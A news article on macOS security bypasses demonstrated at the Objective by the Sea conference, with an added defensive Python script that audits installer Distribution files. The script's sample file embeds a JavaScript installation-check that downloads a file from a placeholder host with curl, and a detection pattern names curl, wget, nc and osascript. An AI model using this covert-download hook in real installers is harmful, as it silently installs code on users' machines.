Researchers demonstrate new methods of bypassing macOS security



Although Apple has taken steps to shore up the security of its macOS platform, vulnerabilities are still surfacing that could bypass some of its most important protections.

According to a new report from cybersecurity firm Malwarebytes, a handful of vulnerabilities and exploits shown off at the Objective by the Sea (OBTS) conference illustrate how Mac-targeting attacks are evolving. OBTS is the only security conference that focuses solely on Apple devices and products.

For example, security researchers demonstrated two attacks that bypassed Apple's Transparency, Consent, and Control (TCC) system — the mechanism that requires user consent before a program can access specific data.

One attack involved a remote attacker with root permissions granting data access to a malicious process simply by creating a new user on the system and having that user grant the permissions. Another vulnerability leveraged mount points for disk image files: the researcher was able to modify a specific permissions database and grant TCC permissions to practically any process.

Another vulnerability demonstrated at the OBTS conference concerns which types of data the Mac's TCC protections actually cover. For example, malware can potentially collect data from the .ssh folder, which is used to store certificates that authenticate connections. This, according to Malwarebytes, could allow an attacker to "move around" an organization's infrastructure if they gained access to that folder.

macOS installers

Other attacks that made an appearance during the OBTS conference include ones that target or bypass Apple's installer protections.

The Silver Sparrow malware, for example, abuses the Distribution file of a Mac installer package, which conveys information and options to the installer. JavaScript code can run from the Distribution file, opening a door for potential attacks.

Specifically, Silver Sparrow used a script originally intended to check whether a system met installation requirements to download and install malware covertly.
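A defender can audit this installer mechanism before running a package: the Distribution file is plain XML, so its pre-install hooks (`installation-check`, `volume-check`) and the JavaScript they call can be inspected for process-spawning or download behaviour. The script below is an added example for this article, not Malwarebytes' or Apple's code; the sample Distribution file and its JavaScript body are constructed to mirror the pattern described above, and `system.run` is the Installer JavaScript API call that launches external programs.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample Distribution file in the installer package format.
# The JavaScript body illustrates the pattern, not Silver Sparrow's actual code.
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="1">
    <title>Example Updater</title>
    <options customize="never" require-scripts="false"/>
    <installation-check script="installationCheck();"/>
    <script>
function installationCheck() {
    system.run('/usr/bin/curl', '-o', '/tmp/stage', 'https://updates.example.invalid/stage');
    return true;
}
    </script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default"><pkg-ref id="com.example.updater"/></choice>
    <pkg-ref id="com.example.updater" version="1.0">#updater.pkg</pkg-ref>
</installer-gui-script>
"""

# A requirements check has no legitimate need to spawn processes or fetch files.
PROCESS_SPAWN = re.compile(r"\bsystem\.run(Once)?\s*\(")
NETWORK_TOOLS = re.compile(r"\b(curl|wget|nc|osascript)\b")


def audit_distribution(xml_text):
    """Return a list of findings describing script-driven behaviour in a Distribution file."""
    root = ET.fromstring(xml_text)
    findings = []
    # Hooks whose JavaScript runs before the user has seen what will be installed.
    for hook in ("installation-check", "volume-check"):
        for el in root.iter(hook):
            if el.get("script"):
                findings.append(f"{hook} runs script: {el.get('script')}")
    # Inspect every embedded JavaScript block for suspicious calls.
    for script in root.iter("script"):
        body = script.text or ""
        if PROCESS_SPAWN.search(body):
            findings.append("script spawns a process via system.run")
        if NETWORK_TOOLS.search(body):
            findings.append("script references a download or remote-execution tool")
    return findings


if __name__ == "__main__":
    for finding in audit_distribution(SAMPLE_DISTRIBUTION):
        print("FINDING:", finding)
```

On a real package, run `pkgutil --expand` first and feed the resulting `Distribution` file's contents to `audit_distribution`; an empty result means no pre-install scripting was found, not that the component payloads are clean.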

Another way to bypass Apple's installation protections involves payload-free installers: installers that don't install anything themselves, but instead serve as a shell for a script that carries out the installation.

At least two more vulnerabilities were discussed at OBTS: maliciously crafted installer plugins that install payloads on a system, and a flaw in macOS that could allow a Mac app to bypass Gatekeeper entirely.

More information about the vulnerabilities and the researchers who discovered them can be found on Malwarebytes' blog.